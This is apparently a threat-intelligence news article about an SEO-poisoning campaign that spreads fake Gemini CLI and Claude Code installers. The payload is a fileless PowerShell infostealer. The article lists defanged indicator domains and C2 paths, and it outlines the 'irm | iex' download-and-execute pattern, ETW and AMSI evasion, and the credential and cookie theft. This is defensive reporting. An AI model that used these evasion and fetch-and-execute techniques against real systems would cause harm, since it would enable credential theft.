Attackers Abuse SEO Poisoning to Spread Fake Gemini and Claude Installers

Financially motivated threat actors are increasingly targeting software developers by impersonating popular AI coding assistants.

In a newly uncovered campaign, attackers are leveraging SEO poisoning to surface fake installation pages for Gemini CLI and Claude Code, ultimately compromising enterprise networks with a sophisticated, fileless PowerShell infostealer.

The campaign, initially spotted by independent threat researcher @g0njxa in early March 2026, relies on the manipulation of search engine results.

When developers search for official Gemini or Claude tools, they are directed to typosquatted domains like geminicli[.]co[.]com and claudecode[.]co[.]com. These malicious sites perfectly clone legitimate vendor documentation to deceive users.

SEO Poisoning to Spread Fake Gemini and Claude Installers

Instead of a standard installer download, the pages instruct victims to copy and paste a single PowerShell command into their terminal. This tactic exploits the common developer habit of running one-line setup scripts without close inspection, said Eclecticiq.

Once executed, the command reaches out to staging servers, such as gemini-setup[.]com or claude-setup[.]com, to pull down the malicious payload. To avoid arousing suspicion, the initial script performs two actions simultaneously.

It legitimately installs the requested package from Google’s official npm registry (npm install -g @google/gemini-cli), presenting the user with normal dependency resolution and progress bars.

In the background, it uses a hidden window to download and execute the second-stage infostealer directly into memory using the irm [URL] | iex command pattern.

Once active, the PowerShell script immediately moves to neutralize visibility into Microsoft Windows endpoints. It patches the PSEtwLogProvider.m_enabled flag to suppress PowerShell-specific Event Tracing for Windows (ETW) telemetry and bypasses the Antimalware Scan Interface (AMSI).

This allows the heavily obfuscated malware to operate in an effectively unmonitored environment without triggering heuristic or signature-based security alerts.

Operating entirely in memory, the infostealer focuses heavily on extracting high-value assets from developer workstations, said Eclecticiq.

It uses embedded C# types loaded at runtime to bypass heavily monitored cmdlets, querying Windows Credential Manager, and enumerating running processes to map the environment.

The malware harvests a wide array of sensitive enterprise data:

• Session cookies and autofill data from Chromium-based browsers and Firefox.
• Local State keys and session data from corporate communication platforms like Slack, Microsoft Teams, and Discord.
• Remote access credentials, including WinSCP registry passwords, PuTTY sessions, and OpenVPN configurations.
• Cryptocurrency wallets and locally synced cloud storage directories.

This stolen data is subsequently packaged and exfiltrated to command-and-control (C2) servers such as events[.]msft23[.]com and events[.]ms709[.]com.

Because stolen session material grants attackers authenticated access to internal workspaces, it effectively bypasses multi-factor authentication and is highly valuable in underground access broker markets.

Passive DNS analysis of the infrastructure, hosted on the Netherlands-based provider MIRhosting, reveals a much larger operation.

Eclecticiq researchers have identified over 30 related domains targeting other critical developer tools, including Node.js, Chocolatey, and KeePassXC.

Domains like nodejs-setup.co[.]com Instruct users to run spoofed Chocolatey installation scripts, stacking spoofed domains into a single social engineering flow.

By rotating lure brands and C2 hostnames while maintaining the underlying PowerShell implant, the threat actors demonstrate a deep understanding of developer workflows.

Because developers hold elevated privileges across source code repositories and enterprise networks, these opportunistic attacks present a severe supply chain risk.

Indicator	Type	Description
geminicli[.]co[.]com	Domain	Malicious Gemini CLI installation page
gemini-setup[.]com	Domain	Payload staging server for the Gemini campaign
events[.]msft23[.]com	Domain	Command-and-control (C2) server for the Gemini campaign
claudecode[.]co[.]com	Domain	Malicious Claude Code installation page
claude-setup[.]com	Domain	Payload staging server for the Claude campaign
claude-code.co[.]com	Domain	Malicious Claude Code installation page (domain variation)
events[.]ms709[.]com	Domain	Command-and-control (C2) server for the Claude and Node.js campaigns
nodejs-setup.co[.]com	Domain	Malicious Node.js installation page
109.107.170[.]111	IP Address	Bulletproof hosting IP (MIRhosting) serving campaign domains
/take	URI Path	C2 endpoint used to request initial configuration or staging data
/process	URI Path	C2 beacon endpoint used for data exfiltration and retrieving operator tasks
/validate	URI Path	C2 endpoint used to confirm task execution or report status
Install.ps1	File Name	Infostealer downloader payload script

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Security teams should proactively hunt for irm | iex download patterns in command-line telemetry and enforce PowerShell Constrained Language Mode (CLM) on developer workstations to mitigate this threat.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post Attackers Abuse SEO Poisoning to Spread Fake Gemini and Claude Installers appeared first on Cyber Security News.